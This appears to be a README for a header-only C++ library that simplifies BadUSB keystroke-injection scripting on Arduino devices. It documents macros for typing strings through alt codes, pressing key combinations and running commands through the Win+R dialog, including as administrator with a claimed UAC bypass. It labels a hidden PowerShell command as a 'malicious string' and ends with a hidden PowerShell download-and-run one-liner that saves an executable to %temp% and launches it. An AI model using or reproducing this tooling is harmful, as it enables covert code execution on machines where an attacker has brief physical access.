simple header only lib written in C++ to make BadUsb scripting easier (Arduino IDE)
image from github.com/ElijahCuff/HW-374
#include "alt.hpp"
BEGIN()
//
// commands
//
END()
static const alt_code alt_codes_array[] = {
{' ', 32}, {'B', 66}, {'C', 67}, {'D', 68}, {'E', 69}, {'F', 70},
{'G', 71}, {'H', 72}, {'I', 73}, {'J', 74}, {'K', 75}, {'L', 76},
{'M', 77}, {'N', 78}, {'O', 79}, {'P', 80}, {'Q', 81}, {'R', 82},
{'S', 83}, {'T', 84}, {'U', 85}, {'V', 86}, {'W', 87}, {'X', 88},
{'Y', 89}, {'Z', 90}, {'a', 97}, {'b', 98}, {'c', 99}, {'d', 100},
{'e', 101}, {'f', 102}, {'g', 103}, {'h', 104}, {'i', 105}, {'j', 106},
{'k', 107}, {'l', 108}, {'m', 109}, {'n', 110}, {'o', 111}, {'p', 112},
{'q', 113}, {'r', 114}, {'s', 115}, {'t', 116}, {'u', 117}, {'v', 118},
{'w', 119}, {'x', 120}, {'y', 121}, {'z', 122}, {'0', 48}, {'1', 49},
{'2', 50}, {'3', 51}, {'4', 52}, {'5', 53}, {'6', 54}, {'7', 55},
{'8', 56}, {'9', 57}, {'!', 33}, {'"', 34}, {'#', 35}, {'$', 36},
{'%', 37}, {'&', 38}, {'\'', 39}, {'(', 40}, {')', 41}, {'*', 42},
{'+', 43}, {',', 44}, {'-', 45}, {'.', 46}, {'/', 47}, {':', 58},
{';', 59}, {'<', 60}, {'=', 61}, {'>', 62}, {'?', 63}, {'@', 64},
{'[', 91}, {'\\', 92}, {']', 93}, {'^', 94}, {'_', 95}, {'`', 96},
{'{', 123}, {'|', 124}, {'}', 125}, {'~', 126}, {'A', 65}};
const char *payload_str = "powershell -windowstyle hidden..."; // malicious string
// void alt_print(const char *str, size_t t_sleep)
alt_print(payload_str, 0); // (malicious_string, sleep time for enter next char)
/* sleep time for enter next char.. because i had problems on Windows 7
that the system was unable to process alt codes, on Win 10/11 work well */
#define MKEY_LEFT_CTRL (0x0001 << 0x00)
#define MKEY_LEFT_WIN (0x0001 << 0x01)
#define MKEY_LEFT_SHIFT (0x0001 << 0x02)
#define MKEY_LEFT_ALT (0x0001 << 0x03)
#define MKEY_ENTER (0x0001 << 0x04)
#define MKEY_LEFT_ARROW (0x0001 << 0x05)
#define MKEY_RIGHT_ARROW (0x0001 << 0x06)
#define MKEY_CH_R (0x0001 << 0x07)
#define MKEY_CH_A (0x0001 << 0x08)
#define MKEY_CH_C (0x0001 << 0x09)
#define MKEY_FN_4 (0x0001 << 0x0A)
#define MKEY_CH_Y (0x0001 << 0x0B)
The PRESS functions is used to press special keys and simultaneously press several keys on the keyboard
// #define PRESS(BTNS, t_sleep)
PRESS(MKEY_LEFT_CTRL | MKEY_LEFT_SHIFT | MKEY_ENTER, 200) // (buttons to be pressed, sleep time for press next button)
// #define PRESS_KRELALL(BTNS, t_sleep, t_wait)
PRESS_KRELALL(MKEY_LEFT_WIN | MKEY_CH_R, 200, 500) // (buttons to be pressed, sleep time for press next button, sleep time to release the buttons)
// bool release_btn(const uint8_t button)
release_btn(MKEY_ENTER) // (buttons to be released)
// void tprint(const char *str, size_t t_sleep)
tprint("echo Hello World!", 30) // (string, sleep time for enter next char), default print (NOT ALT)
// #define WAIT(ms)
WAIT(500) // delay 500 ms
// #define RUN_ENTER(command, t_sleep_print)
RUN_ENTER("msiexec /i https://www.python.org/ftp/python/2.7.18/python-2.7.18.amd64.msi", 0) // (command for win + r (run), sleep time to release the buttons(alt codes))
// #define RUN_ENTER_AS_ADMIN(command, t_sleep_print)
RUN_ENTER_AS_ADMIN("msiexec /i https://www.python.org/ftp/python/2.7.18/python-2.7.18.amd64.msi", 0) // (command for win + r (run), sleep time to release the buttons(alt codes))
// will be run as administrator (UAC bypass if user admin on system)
#include "alt.hpp"
BEGIN()
const char *str = "powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('"
"https://www.python.org/ftp/python/3.11.7/python-3.11.7-amd64.exe', '%temp%/py_install.exe'); %temp%/py_install.exe";
RUN_ENTER(str, 0)
END()